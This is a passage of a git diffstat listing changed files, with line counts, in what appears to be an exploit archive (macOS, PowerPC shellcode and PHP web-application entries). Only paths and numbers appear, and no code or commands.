54 +- platforms/osx/dos/3130.c | 120 +- platforms/osx/dos/3139.rb | 148 +- platforms/osx/dos/3151.rb | 60 +- platforms/osx/dos/3160.html | 66 +- platforms/osx/dos/3167.c | 86 +- platforms/osx/dos/3200.rb | 48 +- platforms/osx/dos/3230.rb | 210 +- platforms/osx/dos/3257.php | 104 +- platforms/osx/dos/4624.c | 90 +- platforms/osx/dos/4690.c | 192 +- platforms/osx/dos/5151.pl | 126 +- platforms/osx/dos/6043.rb | 154 +- platforms/osx/dos/7088.txt | 348 +- platforms/osx/dos/799.c | 6 +- platforms/osx/dos/8262.c | 224 +- platforms/osx/dos/8263.c | 126 +- platforms/osx/dos/8264.c | 132 +- platforms/osx/local/1043.c | 6 +- platforms/osx/local/15.c | 6 +- platforms/osx/local/1545.pl | 96 +- platforms/osx/local/1962.pl | 254 +- platforms/osx/local/1973.pl | 188 +- platforms/osx/local/2106.pl | 296 +- platforms/osx/local/2107.pl | 310 +- platforms/osx/local/2108.sh | 28 +- platforms/osx/local/2111.pl | 156 +- platforms/osx/local/2463.c | 144 +- platforms/osx/local/2565.pl | 118 +- platforms/osx/local/2580.pl | 156 +- 
platforms/osx/local/2737.pl | 132 +- platforms/osx/local/2738.pl | 114 +- platforms/osx/local/3070.pl | 86 +- platforms/osx/local/3087.rb | 246 +- platforms/osx/local/3088.rb | 136 +- platforms/osx/local/3102.rb | 152 +- platforms/osx/local/3156.rb | 96 +- platforms/osx/local/3173.rb | 58 +- platforms/osx/local/3219.rb | 88 +- platforms/osx/local/3386.pl | 104 +- platforms/osx/local/3460.php | 328 +- platforms/osx/local/3517.php | 332 +- platforms/osx/local/367.txt | 6 +- platforms/osx/local/4759.c | 432 +- platforms/osx/local/8108.c | 152 +- platforms/osx/local/8266.txt | 710 +- platforms/osx/local/8896.c | 558 +- platforms/osx/local/896.c | 6 +- platforms/osx/remote/1265.pl | 294 +- platforms/osx/remote/1519.pm | 789 +- platforms/osx/remote/1739.pl | 188 +- platforms/osx/remote/3077.rb | 234 +- platforms/osx/remote/391.pl | 6 +- platforms/osx/remote/6013.pl | 242 +- platforms/osx/remote/8861.rb | 278 +- platforms/osx/remote/9247.py | 276 +- platforms/osx/remote/96.c | 6 +- platforms/osx_ppc/shellcode/13478.c | 90 +- platforms/osx_ppc/shellcode/13479.c | 126 +- platforms/osx_ppc/shellcode/13480.c | 4 +- platforms/osx_ppc/shellcode/13481.c | 4 +- platforms/osx_ppc/shellcode/13482.c | 4 +- platforms/osx_ppc/shellcode/13483.c | 4 +- platforms/osx_ppc/shellcode/13484.c | 4 +- platforms/osx_ppc/shellcode/13485.c | 4 +- platforms/osx_ppc/shellcode/13486.c | 4 +- platforms/osx_ppc/shellcode/13487.c | 4 +- platforms/perl/webapps/39564.txt | 46 + platforms/php/webapps/1003.c | 6 +- platforms/php/webapps/1006.pl | 6 +- platforms/php/webapps/1013.pl | 6 +- platforms/php/webapps/1014.txt | 6 +- platforms/php/webapps/1016.pl | 6 +- platforms/php/webapps/1017.php | 6 +- platforms/php/webapps/1018.php | 6 +- platforms/php/webapps/1020.c | 6 +- platforms/php/webapps/1022.pl | 6 +- platforms/php/webapps/1023.pl | 6 +- platforms/php/webapps/1030.pl | 6 +- platforms/php/webapps/1031.pl | 6 +- platforms/php/webapps/1033.pl | 6 +- platforms/php/webapps/1036.php | 6 +- 
platforms/php/webapps/10379.txt | 2 +- platforms/php/webapps/10388.txt | 2 +- platforms/php/webapps/1049.php | 6 +- platforms/php/webapps/1050.pl | 6 +- platforms/php/webapps/1051.pl | 6 +- platforms/php/webapps/1052.php | 6 +- platforms/php/webapps/1053.pl | 6 +- platforms/php/webapps/1057.pl | 6 +- platforms/php/webapps/10570.txt | 1 - platforms/php/webapps/1058.pl | 6 +- platforms/php/webapps/1059.pl | 6 +- platforms/php/webapps/1060.pl | 6 +- platforms/php/webapps/1061.pl | 6 +- platforms/php/webapps/10640.txt | 1 - platforms/php/webapps/10656.txt | 1 - platforms/php/webapps/10671.txt | 1 - platforms/php/webapps/1068.pl | 6 +- platforms/php/webapps/1069.php | 6 +- platforms/php/webapps/1076.py | 6 +- platforms/php/webapps/1077.pl | 6 +- platforms/php/webapps/1078.pl | 6 +- platforms/php/webapps/1080.pl | 6 +- platforms/php/webapps/1082.pl | 6 +- platforms/php/webapps/1083.pl | 6 +- platforms/php/webapps/1084.pl | 6 +- platforms/php/webapps/10844.txt | 1 - platforms/php/webapps/10847.txt | 1 - platforms/php/webapps/1088.pl | 6 +- platforms/php/webapps/10889.txt | 1 - platforms/php/webapps/1095.txt | 6 +- platforms/php/webapps/1097.txt | 6 +- platforms/php/webapps/10971.txt | 1 - platforms/php/webapps/10979.txt | 1 - platforms/php/webapps/1103.txt | 30 +- platforms/php/webapps/1111.pl | 6 +- platforms/php/webapps/1113.pm | 6 +- platforms/php/webapps/1133.pm | 6 +- platforms/php/webapps/1134.pl | 6 +- platforms/php/webapps/1135.c | 6 +- platforms/php/webapps/11449.txt | 1 - platforms/php/webapps/1145.pm | 6 +- platforms/php/webapps/11484.txt | 1 - platforms/php/webapps/11543.txt | 1 - platforms/php/webapps/1172.pl | 6 +- platforms/php/webapps/1189.c | 6 +- platforms/php/webapps/1191.pl | 6 +- platforms/php/webapps/1200.php | 6 +- platforms/php/webapps/12007.txt | 1 - platforms/php/webapps/1202.php | 6 +- platforms/php/webapps/12028.txt | 1 - platforms/php/webapps/12054.txt | 1 - platforms/php/webapps/12055.txt | 1 - platforms/php/webapps/12056.txt | 1 - 
platforms/php/webapps/1207.php | 6 +- platforms/php/webapps/1208.pl | 6 +- platforms/php/webapps/12082.txt | 1 - platforms/php/webapps/12083.txt | 1 - platforms/php/webapps/12084.txt | 1 - platforms/php/webapps/12085.txt | 1 - platforms/php/webapps/12087.txt | 1 - platforms/php/webapps/12088.txt | 1 - platforms/php/webapps/12089.txt | 1 - platforms/php/webapps/12101.txt | 1 - platforms/php/webapps/1211.pl | 6 +- platforms/php/webapps/12115.txt | 1 - platforms/php/webapps/12118.txt | 1 - platforms/php/webapps/1214.php | 6 +- platforms/php/webapps/12142.txt | 1 - platforms/php/webapps/12143.txt | 1 - platforms/php/webapps/12144.txt | 1 - platforms/php/webapps/12145.txt | 1 - platforms/php/webapps/12146.txt | 1 - platforms/php/webapps/12147.txt | 1 - platforms/php/webapps/12148.txt | 1 - platforms/php/webapps/12149.txt | 1 - platforms/php/webapps/12150.txt | 1 - platforms/php/webapps/12151.txt | 1 - platforms/php/webapps/1217.pl | 96 +- platforms/php/webapps/1219.c | 266 +- platforms/php/webapps/1221.php | 382 +- platforms/php/webapps/12230.txt | 1 - platforms/php/webapps/12231.txt | 1 - platforms/php/webapps/12232.txt | 1 - platforms/php/webapps/12233.txt | 1 - platforms/php/webapps/12234.txt | 1 - platforms/php/webapps/12235.txt | 1 - platforms/php/webapps/12236.txt | 1 - platforms/php/webapps/12237.txt | 1 - platforms/php/webapps/12238.txt | 1 - platforms/php/webapps/12239.txt | 1 - platforms/php/webapps/1225.php | 324 +- platforms/php/webapps/1226.php | 348 +- platforms/php/webapps/1227.php | 394 +- platforms/php/webapps/12296.txt | 1 - platforms/php/webapps/12318.txt | 1 - platforms/php/webapps/12364.txt | 1 - platforms/php/webapps/12365.txt | 1 - platforms/php/webapps/12366.txt | 1 - platforms/php/webapps/1237.php | 396 +- platforms/php/webapps/1240.php | 328 +- platforms/php/webapps/1241.php | 396 +- platforms/php/webapps/12426.txt | 1 - platforms/php/webapps/12428.txt | 1 - platforms/php/webapps/1244.pl | 106 +- platforms/php/webapps/1245.php | 584 +- 
platforms/php/webapps/12481.txt | 1 - platforms/php/webapps/1250.php | 952 +- platforms/php/webapps/12579.txt | 1 - platforms/php/webapps/12594.txt | 1 - platforms/php/webapps/1270.php | 512 +- platforms/php/webapps/1273.pl | 130 +- platforms/php/webapps/1278.pl | 786 +- platforms/php/webapps/12790.txt | 1 - platforms/php/webapps/1280.pl | 94 +- platforms/php/webapps/12811.txt | 1 - platforms/php/webapps/12856.txt | 2 +- platforms/php/webapps/12867.txt | 1 - platforms/php/webapps/1289.php | 288 +- platforms/php/webapps/1296.txt | 26 +- platforms/php/webapps/1298.php | 438 +- platforms/php/webapps/1312.php | 468 +- platforms/php/webapps/1315.php | 564 +- platforms/php/webapps/1317.py | 130 +- platforms/php/webapps/1320.txt | 68 +- platforms/php/webapps/1321.pl | 86 +- platforms/php/webapps/1322.pl | 90 +- platforms/php/webapps/1324.php | 764 +- platforms/php/webapps/1325.pl | 56 +- platforms/php/webapps/1326.pl | 118 +- platforms/php/webapps/1329.php | 576 +- platforms/php/webapps/1337.php | 448 +- platforms/php/webapps/1340.php | 834 +- platforms/php/webapps/1342.php | 458 +- platforms/php/webapps/1354.php | 584 +- platforms/php/webapps/1356.php | 696 +- platforms/php/webapps/1358.php | 440 +- platforms/php/webapps/1359.php | 444 +- platforms/php/webapps/1361.c | 298 +- platforms/php/webapps/1363.php | 660 +- platforms/php/webapps/1364.c | 290 +- platforms/php/webapps/1370.php | 542 +- platforms/php/webapps/1373.php | 420 +- platforms/php/webapps/1379.php | 586 +- platforms/php/webapps/1382.pl | 262 +- platforms/php/webapps/1383.txt | 66 +- platforms/php/webapps/1385.pl | 132 +- platforms/php/webapps/1388.pl | 206 +- platforms/php/webapps/13925.txt | 2 +- platforms/php/webapps/1395.php | 428 +- platforms/php/webapps/1398.pl | 252 +- platforms/php/webapps/1400.pl | 326 +- platforms/php/webapps/1401.pl | 222 +- platforms/php/webapps/1405.pl | 174 +- platforms/php/webapps/1410.pl | 210 +- platforms/php/webapps/14415.html | 2 +- platforms/php/webapps/1442.pl | 170 +- 
platforms/php/webapps/1446.pl | 248 +- platforms/php/webapps/1453.pl | 114 +- platforms/php/webapps/1457.txt | 46 +- platforms/php/webapps/1459.pl | 188 +- platforms/php/webapps/1461.pl | 130 +- platforms/php/webapps/1467.php | 422 +- platforms/php/webapps/1468.php | 408 +- platforms/php/webapps/1469.pl | 94 +- platforms/php/webapps/1478.php | 1754 +-- platforms/php/webapps/1482.php | 404 +- platforms/php/webapps/1485.php | 768 +- platforms/php/webapps/1491.php | 402 +- platforms/php/webapps/1492.php | 120 +- platforms/php/webapps/1493.php | 530 +- platforms/php/webapps/1494.php | 584 +- platforms/php/webapps/1498.php | 144 +- platforms/php/webapps/1499.pl | 132 +- platforms/php/webapps/1501.php | 410 +- platforms/php/webapps/1503.pl | 180 +- platforms/php/webapps/1509.pl | 266 +- platforms/php/webapps/1510.pl | 146 +- platforms/php/webapps/1511.php | 838 +- platforms/php/webapps/1512.pl | 148 +- platforms/php/webapps/1513.php | 138 +- platforms/php/webapps/1516.php | 144 +- platforms/php/webapps/1521.php | 452 +- platforms/php/webapps/1522.php | 980 +- platforms/php/webapps/1523.cpp | 538 +- platforms/php/webapps/1524.htm | 180 +- platforms/php/webapps/1525.pl | 80 +- platforms/php/webapps/1526.php | 164 +- platforms/php/webapps/1527.pl | 110 +- platforms/php/webapps/1530.pl | 88 +- platforms/php/webapps/1532.pl | 92 +- platforms/php/webapps/1533.php | 828 +- platforms/php/webapps/1538.pl | 120 +- platforms/php/webapps/1539.txt | 112 +- platforms/php/webapps/1541.pl | 88 +- platforms/php/webapps/1542.pl | 106 +- platforms/php/webapps/1543.pl | 140 +- platforms/php/webapps/1544.pl | 144 +- platforms/php/webapps/1546.pl | 182 +- platforms/php/webapps/1547.txt | 100 +- platforms/php/webapps/1548.pl | 112 +- platforms/php/webapps/1549.php | 502 +- platforms/php/webapps/1553.pl | 168 +- platforms/php/webapps/1556.pl | 136 +- platforms/php/webapps/1561.pl | 166 +- platforms/php/webapps/1563.pm | 338 +- platforms/php/webapps/1566.php | 408 +- 
platforms/php/webapps/1567.php | 158 +- platforms/php/webapps/1570.pl | 86 +- platforms/php/webapps/1575.pl | 362 +- platforms/php/webapps/1576.txt | 70 +- platforms/php/webapps/1581.pl | 252 +- platforms/php/webapps/1585.php | 356 +- platforms/php/webapps/1586.php | 294 +- platforms/php/webapps/1587.pl | 176 +- platforms/php/webapps/1588.php | 704 +- platforms/php/webapps/1590.pl | 118 +- platforms/php/webapps/1594.py | 102 +- platforms/php/webapps/1595.php | 724 +- platforms/php/webapps/1600.php | 166 +- platforms/php/webapps/1605.php | 360 +- platforms/php/webapps/1608.php | 376 +- platforms/php/webapps/1609.pl | 232 +- platforms/php/webapps/1610.txt | 20 +- platforms/php/webapps/1611.pl | 214 +- platforms/php/webapps/1612.php | 376 +- platforms/php/webapps/1616.pl | 232 +- platforms/php/webapps/1617.php | 346 +- platforms/php/webapps/1618.c | 198 +- platforms/php/webapps/1619.pl | 92 +- platforms/php/webapps/1621.php | 330 +- platforms/php/webapps/1627.php | 348 +- platforms/php/webapps/1629.pl | 176 +- platforms/php/webapps/1630.pl | 178 +- platforms/php/webapps/1631.php | 280 +- platforms/php/webapps/1632.pl | 184 +- platforms/php/webapps/1640.pl | 174 +- platforms/php/webapps/1644.pl | 182 +- platforms/php/webapps/1645.pl | 1078 +- platforms/php/webapps/1646.php | 398 +- platforms/php/webapps/1647.php | 414 +- platforms/php/webapps/1650.pl | 260 +- platforms/php/webapps/1652.php | 358 +- platforms/php/webapps/1653.txt | 158 +- platforms/php/webapps/1654.txt | 56 +- platforms/php/webapps/1655.php | 166 +- platforms/php/webapps/1656.txt | 78 +- platforms/php/webapps/1659.php | 454 +- platforms/php/webapps/1660.pm | 254 +- platforms/php/webapps/1661.pl | 226 +- platforms/php/webapps/1663.php | 366 +- platforms/php/webapps/1665.pl | 118 +- platforms/php/webapps/1666.php | 578 +- platforms/php/webapps/1668.php | 124 +- platforms/php/webapps/1672.pl | 74 +- platforms/php/webapps/1673.php | 442 +- platforms/php/webapps/1674.txt | 100 +- 
platforms/php/webapps/1678.php | 444 +- platforms/php/webapps/1682.php | 182 +- platforms/php/webapps/1683.php | 172 +- platforms/php/webapps/1686.pl | 104 +- platforms/php/webapps/1687.txt | 20 +- platforms/php/webapps/1694.pl | 166 +- platforms/php/webapps/1695.pl | 104 +- platforms/php/webapps/1697.php | 532 +- platforms/php/webapps/1701.php | 414 +- platforms/php/webapps/1704.pl | 124 +- platforms/php/webapps/1705.pl | 120 +- platforms/php/webapps/1706.txt | 66 +- platforms/php/webapps/1707.pl | 138 +- platforms/php/webapps/1711.txt | 22 +- platforms/php/webapps/1713.pl | 114 +- platforms/php/webapps/1720.pl | 388 +- platforms/php/webapps/1722.txt | 16 +- platforms/php/webapps/1723.txt | 14 +- platforms/php/webapps/1724.pl | 126 +- platforms/php/webapps/1725.pl | 116 +- platforms/php/webapps/1726.pl | 712 +- platforms/php/webapps/1727.txt | 16 +- platforms/php/webapps/1728.txt | 16 +- platforms/php/webapps/1729.txt | 16 +- platforms/php/webapps/1730.txt | 14 +- platforms/php/webapps/1731.txt | 38 +- platforms/php/webapps/1732.pl | 188 +- platforms/php/webapps/1733.pl | 374 +- platforms/php/webapps/1738.php | 566 +- platforms/php/webapps/1740.pl | 152 +- platforms/php/webapps/1744.pl | 152 +- platforms/php/webapps/1747.pl | 152 +- platforms/php/webapps/1751.php | 102 +- platforms/php/webapps/1753.txt | 38 +- platforms/php/webapps/1756.pl | 248 +- platforms/php/webapps/1760.php | 1220 +- platforms/php/webapps/1761.pl | 166 +- platforms/php/webapps/1764.txt | 18 +- platforms/php/webapps/1765.pl | 150 +- platforms/php/webapps/1766.pl | 178 +- platforms/php/webapps/1767.txt | 38 +- platforms/php/webapps/1768.php | 122 +- platforms/php/webapps/1769.txt | 42 +- platforms/php/webapps/1773.txt | 112 +- platforms/php/webapps/1774.txt | 44 +- platforms/php/webapps/1777.php | 764 +- platforms/php/webapps/1778.txt | 98 +- platforms/php/webapps/1779.txt | 48 +- platforms/php/webapps/1780.php | 1832 +-- platforms/php/webapps/1785.php | 452 +- platforms/php/webapps/1789.txt | 
56 +- platforms/php/webapps/1790.txt | 18 +- platforms/php/webapps/1793.pl | 158 +- platforms/php/webapps/1795.txt | 30 +- platforms/php/webapps/1796.php | 304 +- platforms/php/webapps/1797.php | 634 +- platforms/php/webapps/1798.txt | 22 +- platforms/php/webapps/1800.txt | 64 +- platforms/php/webapps/1804.txt | 18 +- platforms/php/webapps/1805.pl | 206 +- platforms/php/webapps/1808.txt | 30 +- platforms/php/webapps/1809.txt | 62 +- platforms/php/webapps/1810.pl | 150 +- platforms/php/webapps/1811.php | 448 +- platforms/php/webapps/1814.txt | 28 +- platforms/php/webapps/1816.php | 384 +- platforms/php/webapps/1817.txt | 88 +- platforms/php/webapps/1818.txt | 86 +- platforms/php/webapps/1821.php | 786 +- platforms/php/webapps/1823.txt | 64 +- platforms/php/webapps/1824.txt | 64 +- platforms/php/webapps/1825.txt | 66 +- platforms/php/webapps/1826.txt | 36 +- platforms/php/webapps/1827.txt | 38 +- platforms/php/webapps/1828.txt | 36 +- platforms/php/webapps/1829.txt | 366 +- platforms/php/webapps/1832.txt | 30 +- platforms/php/webapps/1835.txt | 48 +- platforms/php/webapps/1839.txt | 24 +- platforms/php/webapps/1841.txt | 56 +- platforms/php/webapps/1842.htm | 122 +- platforms/php/webapps/1843.txt | 44 +- platforms/php/webapps/1844.txt | 30 +- platforms/php/webapps/1846.txt | 20 +- platforms/php/webapps/1847.txt | 24 +- platforms/php/webapps/1848.txt | 56 +- platforms/php/webapps/1851.txt | 14 +- platforms/php/webapps/1853.php | 274 +- platforms/php/webapps/1854.txt | 42 +- platforms/php/webapps/1855.txt | 190 +- platforms/php/webapps/1857.pl | 216 +- platforms/php/webapps/1858.txt | 42 +- platforms/php/webapps/1860.txt | 26 +- platforms/php/webapps/1861.txt | 40 +- platforms/php/webapps/1863.txt | 44 +- platforms/php/webapps/1864.txt | 46 +- platforms/php/webapps/1865.txt | 34 +- platforms/php/webapps/1866.txt | 58 +- platforms/php/webapps/1868.php | 768 +- platforms/php/webapps/1869.php | 378 +- platforms/php/webapps/1870.txt | 78 +- platforms/php/webapps/1871.txt | 
92 +- platforms/php/webapps/1874.php | 292 +- platforms/php/webapps/1875.htm | 542 +- platforms/php/webapps/1876.pl | 108 +- platforms/php/webapps/1877.php | 300 +- platforms/php/webapps/1879.txt | 52 +- platforms/php/webapps/1881.txt | 40 +- platforms/php/webapps/1882.pl | 98 +- platforms/php/webapps/1883.txt | 56 +- platforms/php/webapps/1886.txt | 54 +- platforms/php/webapps/1887.txt | 60 +- platforms/php/webapps/1888.txt | 38 +- platforms/php/webapps/1890.txt | 20 +- platforms/php/webapps/1891.txt | 60 +- platforms/php/webapps/1892.pl | 154 +- platforms/php/webapps/1895.txt | 56 +- platforms/php/webapps/1896.txt | 56 +- platforms/php/webapps/1897.txt | 62 +- platforms/php/webapps/1898.txt | 108 +- platforms/php/webapps/1899.txt | 56 +- platforms/php/webapps/1901.pl | 216 +- platforms/php/webapps/1902.txt | 64 +- platforms/php/webapps/1903.txt | 96 +- platforms/php/webapps/1904.php | 414 +- platforms/php/webapps/1905.txt | 64 +- platforms/php/webapps/1907.txt | 56 +- platforms/php/webapps/1908.txt | 58 +- platforms/php/webapps/1909.pl | 412 +- platforms/php/webapps/1912.txt | 102 +- platforms/php/webapps/1913.txt | 60 +- platforms/php/webapps/1914.txt | 106 +- platforms/php/webapps/1916.txt | 36 +- platforms/php/webapps/1918.php | 918 +- platforms/php/webapps/1919.txt | 174 +- platforms/php/webapps/1920.php | 530 +- platforms/php/webapps/1921.pl | 176 +- platforms/php/webapps/1923.txt | 30 +- platforms/php/webapps/1925.txt | 236 +- platforms/php/webapps/1926.txt | 82 +- platforms/php/webapps/1928.txt | 98 +- platforms/php/webapps/1929.txt | 38 +- platforms/php/webapps/1932.php | 694 +- platforms/php/webapps/1933.txt | 140 +- platforms/php/webapps/1934.txt | 12 +- platforms/php/webapps/1936.txt | 46 +- platforms/php/webapps/1938.pl | 294 +- platforms/php/webapps/1939.php | 198 +- platforms/php/webapps/1941.php | 468 +- platforms/php/webapps/1942.txt | 44 +- platforms/php/webapps/1943.txt | 138 +- platforms/php/webapps/1945.pl | 178 +- 
platforms/php/webapps/1946.php | 354 +- platforms/php/webapps/1948.txt | 34 +- platforms/php/webapps/1950.pl | 136 +- platforms/php/webapps/1951.txt | 126 +- platforms/php/webapps/1952.txt | 112 +- platforms/php/webapps/1953.pl | 152 +- platforms/php/webapps/1954.pl | 162 +- platforms/php/webapps/1955.txt | 110 +- platforms/php/webapps/1956.txt | 134 +- platforms/php/webapps/1957.pl | 154 +- platforms/php/webapps/1959.txt | 100 +- platforms/php/webapps/1960.php | 352 +- platforms/php/webapps/1961.txt | 44 +- platforms/php/webapps/1963.txt | 150 +- platforms/php/webapps/1969.txt | 112 +- platforms/php/webapps/1970.txt | 114 +- platforms/php/webapps/1971.txt | 32 +- platforms/php/webapps/1974.txt | 88 +- platforms/php/webapps/1975.pl | 96 +- platforms/php/webapps/1981.txt | 28 +- platforms/php/webapps/1982.txt | 112 +- platforms/php/webapps/1983.txt | 130 +- platforms/php/webapps/1991.php | 562 +- platforms/php/webapps/1993.php | 354 +- platforms/php/webapps/1994.txt | 30 +- platforms/php/webapps/1995.txt | 42 +- platforms/php/webapps/1996.txt | 44 +- platforms/php/webapps/1998.pl | 252 +- platforms/php/webapps/2002.pl | 234 +- platforms/php/webapps/2003.txt | 40 +- platforms/php/webapps/2007.php | 588 +- platforms/php/webapps/2008.php | 422 +- platforms/php/webapps/2009.txt | 44 +- platforms/php/webapps/2019.txt | 52 +- platforms/php/webapps/2020.txt | 36 +- platforms/php/webapps/2021.txt | 68 +- platforms/php/webapps/2022.txt | 60 +- platforms/php/webapps/2024.txt | 42 +- platforms/php/webapps/2025.txt | 78 +- platforms/php/webapps/2026.txt | 38 +- platforms/php/webapps/2027.txt | 38 +- platforms/php/webapps/2028.txt | 38 +- platforms/php/webapps/2029.txt | 52 +- platforms/php/webapps/2030.txt | 184 +- platforms/php/webapps/2032.pl | 502 +- platforms/php/webapps/2036.txt | 88 +- platforms/php/webapps/2046.txt | 270 +- platforms/php/webapps/2049.txt | 30 +- platforms/php/webapps/2050.php | 296 +- platforms/php/webapps/2058.txt | 56 +- platforms/php/webapps/2060.txt 
| 90 +- platforms/php/webapps/2062.txt | 66 +- platforms/php/webapps/2063.txt | 102 +- platforms/php/webapps/2064.txt | 32 +- platforms/php/webapps/2066.txt | 88 +- platforms/php/webapps/2068.php | 438 +- platforms/php/webapps/2069.txt | 18 +- platforms/php/webapps/2071.php | 528 +- platforms/php/webapps/2072.php | 688 +- platforms/php/webapps/2077.txt | 60 +- platforms/php/webapps/2078.txt | 42 +- platforms/php/webapps/2081.txt | 40 +- platforms/php/webapps/2083.txt | 50 +- platforms/php/webapps/2084.txt | 56 +- platforms/php/webapps/2085.txt | 46 +- platforms/php/webapps/2086.txt | 30 +- platforms/php/webapps/2088.php | 520 +- platforms/php/webapps/2089.txt | 72 +- platforms/php/webapps/2090.txt | 92 +- platforms/php/webapps/2092.txt | 56 +- platforms/php/webapps/2095.txt | 48 +- platforms/php/webapps/2096.txt | 110 +- platforms/php/webapps/2097.txt | 78 +- platforms/php/webapps/2098.txt | 94 +- platforms/php/webapps/2099.txt | 62 +- platforms/php/webapps/2100.txt | 96 +- platforms/php/webapps/2101.txt | 62 +- platforms/php/webapps/2102.txt | 76 +- platforms/php/webapps/2103.txt | 74 +- platforms/php/webapps/2104.txt | 96 +- platforms/php/webapps/2105.php | 842 +- platforms/php/webapps/2109.txt | 78 +- platforms/php/webapps/2110.pm | 322 +- platforms/php/webapps/2113.txt | 48 +- platforms/php/webapps/2114.htm | 38 +- platforms/php/webapps/2115.txt | 38 +- platforms/php/webapps/2116.txt | 50 +- platforms/php/webapps/2117.php | 616 +- platforms/php/webapps/2118.php | 524 +- platforms/php/webapps/2119.txt | 212 +- platforms/php/webapps/2120.txt | 190 +- platforms/php/webapps/2121.txt | 76 +- platforms/php/webapps/2122.txt | 108 +- platforms/php/webapps/2123.txt | 42 +- platforms/php/webapps/2125.txt | 42 +- platforms/php/webapps/2127.txt | 102 +- platforms/php/webapps/2128.txt | 60 +- platforms/php/webapps/2129.txt | 68 +- platforms/php/webapps/2130.txt | 60 +- platforms/php/webapps/2131.txt | 54 +- platforms/php/webapps/2132.txt | 100 +- 
platforms/php/webapps/2133.txt | 66 +- platforms/php/webapps/2134.txt | 144 +- platforms/php/webapps/2137.txt | 82 +- platforms/php/webapps/2139.txt | 34 +- platforms/php/webapps/2141.txt | 38 +- platforms/php/webapps/2142.txt | 42 +- platforms/php/webapps/2143.pl | 138 +- platforms/php/webapps/2146.txt | 42 +- platforms/php/webapps/2148.txt | 48 +- platforms/php/webapps/2149.txt | 48 +- platforms/php/webapps/2151.txt | 106 +- platforms/php/webapps/2152.php | 236 +- platforms/php/webapps/2153.txt | 28 +- platforms/php/webapps/2154.txt | 80 +- platforms/php/webapps/2155.txt | 36 +- platforms/php/webapps/2157.txt | 46 +- platforms/php/webapps/2158.txt | 82 +- platforms/php/webapps/2159.pl | 318 +- platforms/php/webapps/2161.pl | 250 +- platforms/php/webapps/2163.txt | 76 +- platforms/php/webapps/2165.txt | 44 +- platforms/php/webapps/2166.txt | 36 +- platforms/php/webapps/2167.txt | 58 +- platforms/php/webapps/2168.txt | 34 +- platforms/php/webapps/2169.txt | 64 +- platforms/php/webapps/2170.txt | 220 +- platforms/php/webapps/2171.txt | 100 +- platforms/php/webapps/2172.txt | 182 +- platforms/php/webapps/2173.txt | 40 +- platforms/php/webapps/2174.txt | 82 +- platforms/php/webapps/2175.txt | 174 +- platforms/php/webapps/2177.txt | 84 +- platforms/php/webapps/2178.php | 566 +- platforms/php/webapps/2181.pl | 90 +- platforms/php/webapps/2182.txt | 82 +- platforms/php/webapps/2183.txt | 40 +- platforms/php/webapps/2184.txt | 144 +- platforms/php/webapps/2187.htm | 134 +- platforms/php/webapps/2188.txt | 54 +- platforms/php/webapps/2189.txt | 18 +- platforms/php/webapps/2190.txt | 80 +- platforms/php/webapps/2191.txt | 80 +- platforms/php/webapps/2192.txt | 86 +- platforms/php/webapps/2196.txt | 68 +- platforms/php/webapps/2198.php | 484 +- platforms/php/webapps/2199.txt | 144 +- platforms/php/webapps/2200.txt | 20 +- platforms/php/webapps/2201.txt | 88 +- platforms/php/webapps/2202.txt | 78 +- platforms/php/webapps/2203.txt | 76 +- platforms/php/webapps/2205.txt | 80 +- 
platforms/php/webapps/2206.txt | 106 +- platforms/php/webapps/2207.txt | 108 +- platforms/php/webapps/2209.txt | 176 +- platforms/php/webapps/2211.txt | 180 +- platforms/php/webapps/2212.txt | 144 +- platforms/php/webapps/2213.txt | 156 +- platforms/php/webapps/2214.txt | 154 +- platforms/php/webapps/2215.txt | 176 +- platforms/php/webapps/2216.txt | 116 +- platforms/php/webapps/2217.txt | 90 +- platforms/php/webapps/2218.txt | 260 +- platforms/php/webapps/2220.txt | 86 +- platforms/php/webapps/2221.txt | 94 +- platforms/php/webapps/2222.txt | 80 +- platforms/php/webapps/2224.txt | 78 +- platforms/php/webapps/2225.txt | 94 +- platforms/php/webapps/2226.txt | 118 +- platforms/php/webapps/2227.txt | 88 +- platforms/php/webapps/2229.txt | 104 +- platforms/php/webapps/2231.php | 352 +- platforms/php/webapps/2232.pl | 132 +- platforms/php/webapps/2235.txt | 32 +- platforms/php/webapps/2236.txt | 110 +- platforms/php/webapps/2239.txt | 52 +- platforms/php/webapps/2240.txt | 104 +- platforms/php/webapps/2243.php | 560 +- platforms/php/webapps/2247.php | 370 +- platforms/php/webapps/2248.pl | 162 +- platforms/php/webapps/2249.txt | 64 +- platforms/php/webapps/2250.pl | 300 +- platforms/php/webapps/2251.pl | 300 +- platforms/php/webapps/2253.php | 480 +- platforms/php/webapps/2254.txt | 60 +- platforms/php/webapps/2255.txt | 32 +- platforms/php/webapps/2256.txt | 50 +- platforms/php/webapps/2257.txt | 132 +- platforms/php/webapps/2259.txt | 90 +- platforms/php/webapps/2260.pl | 238 +- platforms/php/webapps/2261.php | 450 +- platforms/php/webapps/2262.php | 602 +- platforms/php/webapps/2263.txt | 76 +- platforms/php/webapps/2269.txt | 76 +- platforms/php/webapps/2270.php | 474 +- platforms/php/webapps/2271.txt | 62 +- platforms/php/webapps/2272.txt | 34 +- platforms/php/webapps/2273.txt | 74 +- platforms/php/webapps/2275.txt | 56 +- platforms/php/webapps/2279.txt | 84 +- platforms/php/webapps/2280.pl | 250 +- platforms/php/webapps/2281.pl | 4 +- 
platforms/php/webapps/2282.txt | 48 +- platforms/php/webapps/2285.txt | 120 +- platforms/php/webapps/2288.php | 372 +- platforms/php/webapps/2289.pl | 136 +- platforms/php/webapps/2290.txt | 68 +- platforms/php/webapps/2291.php | 302 +- platforms/php/webapps/2292.txt | 70 +- platforms/php/webapps/2293.txt | 94 +- platforms/php/webapps/2295.txt | 78 +- platforms/php/webapps/2297.pl | 188 +- platforms/php/webapps/2298.php | 450 +- platforms/php/webapps/2299.php | 450 +- platforms/php/webapps/2300.pl | 240 +- platforms/php/webapps/2301.txt | 76 +- platforms/php/webapps/2304.txt | 62 +- platforms/php/webapps/2305.txt | 72 +- platforms/php/webapps/2307.txt | 70 +- platforms/php/webapps/2308.txt | 70 +- platforms/php/webapps/2309.txt | 92 +- platforms/php/webapps/2310.php | 448 +- platforms/php/webapps/2311.txt | 108 +- platforms/php/webapps/2312.txt | 76 +- platforms/php/webapps/2313.txt | 70 +- platforms/php/webapps/2314.txt | 28 +- platforms/php/webapps/2315.txt | 38 +- platforms/php/webapps/2316.txt | 178 +- platforms/php/webapps/2317.txt | 104 +- platforms/php/webapps/2319.txt | 38 +- platforms/php/webapps/2321.php | 334 +- platforms/php/webapps/2322.php | 262 +- platforms/php/webapps/2323.txt | 30 +- platforms/php/webapps/2324.txt | 38 